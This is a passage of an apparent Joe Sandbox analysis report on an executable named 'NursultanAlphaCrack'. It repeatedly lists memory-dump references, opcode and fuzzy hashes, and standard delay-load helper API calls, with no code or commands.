                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: b51fd80f537673b6c53518d45741668ac81e726519da9ec4b809c3c93b4064a1
                                                                                        • Instruction ID: 4e35a5f4e9edfdad2fac8f55359903fff6653c72947bc0c19eef22f61568a17c
                                                                                        • Opcode Fuzzy Hash: b51fd80f537673b6c53518d45741668ac81e726519da9ec4b809c3c93b4064a1
                                                                                        • Instruction Fuzzy Hash: 07B012C526C0457D7108B1483D02D3B018CC0D1F22370422FF404CC380EA405D003471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: fa98938ae66c5f846057e6972c4bff752c6aeac9d19120b9b6afbc6e1c563f98
                                                                                        • Instruction ID: ddb732f571ba16fdd480bcc3734f0725f117628efe741eda0223b4874ad8641f
                                                                                        • Opcode Fuzzy Hash: fa98938ae66c5f846057e6972c4bff752c6aeac9d19120b9b6afbc6e1c563f98
                                                                                        • Instruction Fuzzy Hash: 04B012C536C0857C7108B1483E02C3B058CC0D1F22370812FF504CC380EA405D013471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 06037ab4480c22dee6a010414c931b99c8bf8b315fd0a01d8531f3c4f32a998d
                                                                                        • Instruction ID: 8aaef055ddf645054dd0e5b26895e207110d484563c4c704c052f6031c049313
                                                                                        • Opcode Fuzzy Hash: 06037ab4480c22dee6a010414c931b99c8bf8b315fd0a01d8531f3c4f32a998d
                                                                                        • Instruction Fuzzy Hash: 5DB012C526C1457C7208B1487D03C3B018CC0D1F22330432FF404CC380EA405D443475
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE580
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: fd32798aea6dcb0097acd3ddeeb37ccc1c3353171864d9f5e0ea8ed3f188ef67
                                                                                        • Instruction ID: 6ca9af51548398cc87c57b208d2ec4b4528e7f089672c0801c1d60d5045bfd17
                                                                                        • Opcode Fuzzy Hash: fd32798aea6dcb0097acd3ddeeb37ccc1c3353171864d9f5e0ea8ed3f188ef67
                                                                                        • Instruction Fuzzy Hash: FCB012C52AC0587D7108F1943D02C37018CC4C0B23331412FF408C93C0EA401C202471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE580
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 6e2b177eff1d2792391402b1590124921a821ba591e2353bccf3132d798425b8
                                                                                        • Instruction ID: c4f6121d229b4c01012693a9f6b5c5d335b1e628f7f0bce4a47d598345d38818
                                                                                        • Opcode Fuzzy Hash: 6e2b177eff1d2792391402b1590124921a821ba591e2353bccf3132d798425b8
                                                                                        • Instruction Fuzzy Hash: 17B012C52AC1547C7148F1947D03C37019CC4C0B23331422FF408C93C0EB401C602471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE580
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: fa4b86b1c550cbe5e45d72fc918846a9588888f9c5a526bdc354c24737932c85
                                                                                        • Instruction ID: dc9f0fa999f7cc96e041257e8b2cf380342d29938f5dffbac55ebdd1fac46425
                                                                                        • Opcode Fuzzy Hash: fa4b86b1c550cbe5e45d72fc918846a9588888f9c5a526bdc354c24737932c85
                                                                                        • Instruction Fuzzy Hash: 54B092C56A80547C7108B1946A02C370198C480B22321422BB408C9280AA4019212471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 26d87084d4b96b938895755ad2f452a40ba7e785f5ee36084f54738154c1d371
                                                                                        • Instruction ID: 9920b34da7be1619ace1c1f27735141063eaa72607d48038194ae00c133ae4b3
                                                                                        • Opcode Fuzzy Hash: 26d87084d4b96b938895755ad2f452a40ba7e785f5ee36084f54738154c1d371
                                                                                        • Instruction Fuzzy Hash: DBA011E22A808A3C300832002E02C3B02ACC8C0B22330802FF828E8280AE80280028B2
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 08ee5352fbf1d87d1c8fbe63ac71d9d7dfbfb4bbcea022531b71e437dea9b77c
                                                                                        • Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
                                                                                        • Opcode Fuzzy Hash: 08ee5352fbf1d87d1c8fbe63ac71d9d7dfbfb4bbcea022531b71e437dea9b77c
                                                                                        • Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 2b38a8555f0fd19cb34d2575dd9517c39455c240428ac02ba80d0b210279592b
                                                                                        • Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
                                                                                        • Opcode Fuzzy Hash: 2b38a8555f0fd19cb34d2575dd9517c39455c240428ac02ba80d0b210279592b
                                                                                        • Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: de007fad2795c2b69cbf99d99367a992bc1501814efa7fc68c090cf4da4d89e6
                                                                                        • Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
                                                                                        • Opcode Fuzzy Hash: de007fad2795c2b69cbf99d99367a992bc1501814efa7fc68c090cf4da4d89e6
                                                                                        • Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: d9c5867216365c6b58433ef8f41517f896ca96dc730bb668df66b05564f131ea
                                                                                        • Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
                                                                                        • Opcode Fuzzy Hash: d9c5867216365c6b58433ef8f41517f896ca96dc730bb668df66b05564f131ea
                                                                                        • Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: cbfb57d715a3badb25a8e866db74e2f9230e3dddd1aa0220b172090349b7c011
                                                                                        • Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
                                                                                        • Opcode Fuzzy Hash: cbfb57d715a3badb25a8e866db74e2f9230e3dddd1aa0220b172090349b7c011
                                                                                        • Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 35851f9219b30c4aa6d0b42199c673536899de89cefcdcdae769931e507d18ea
                                                                                        • Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
                                                                                        • Opcode Fuzzy Hash: 35851f9219b30c4aa6d0b42199c673536899de89cefcdcdae769931e507d18ea
                                                                                        • Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 76b824799eae8e75029ec28216fb66e2c8847e09ec93cb502756e04320d42f95
                                                                                        • Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
                                                                                        • Opcode Fuzzy Hash: 76b824799eae8e75029ec28216fb66e2c8847e09ec93cb502756e04320d42f95
                                                                                        • Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 463d5678b1cff3d42d1f181324625debd911694d6aee57a49ac99ccf6dd39d36
                                                                                        • Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
                                                                                        • Opcode Fuzzy Hash: 463d5678b1cff3d42d1f181324625debd911694d6aee57a49ac99ccf6dd39d36
                                                                                        • Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE580
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
